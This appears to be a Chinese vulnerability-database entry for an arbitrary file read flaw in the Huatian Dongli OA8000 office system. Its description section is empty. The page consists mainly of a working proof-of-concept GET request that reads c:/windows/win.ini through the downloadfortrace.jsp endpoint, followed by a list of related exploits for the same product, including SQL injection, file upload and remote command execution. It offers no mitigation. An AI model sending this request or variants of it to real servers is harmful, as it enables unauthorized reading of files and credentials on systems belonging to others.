华天动力OA8000 /OAapp/jsp/trace/downloadfortrace.jsp 文件读取漏洞

漏洞描述

PoC代码

GET /OAapp/jsp/trace/downloadfortrace.jsp?filePath=c:/windows/win.ini HTTP/1.1

相关漏洞推荐

• POC huatiandongli-oa-anyfile-upload: 华天动力 OA 任意文件上传漏洞
• POC oa8000-workflowservice-sql-inject: 华天动力OA 8000版 workFlowService SQL注入漏洞
• POC 华天动力 OA /OAapp/jsp/trace_eWebEditor/downloadfortrace.jsp 文件读取漏洞
• 华天动力OA平台 downloadWpsFile 存在任意文件读取漏洞
• 华天动力OA downloadWpsFile.jsp 任意文件下载漏洞
• 华天动力OA HtEntranceService.do 权限绕过漏洞
• 华天动力OA TemplateService 任意文件读取漏洞
• 华天动力OA存在反序列化远程命令执行漏洞
• 华天动力OA存在任意文件下载漏洞
• 华天动力OA存在任意文件下载漏洞
• 华天动力OA存在弱口令漏洞
• 华天动力OA存在任意文件读取漏洞
• 华天动力OA存在任意文件上传漏洞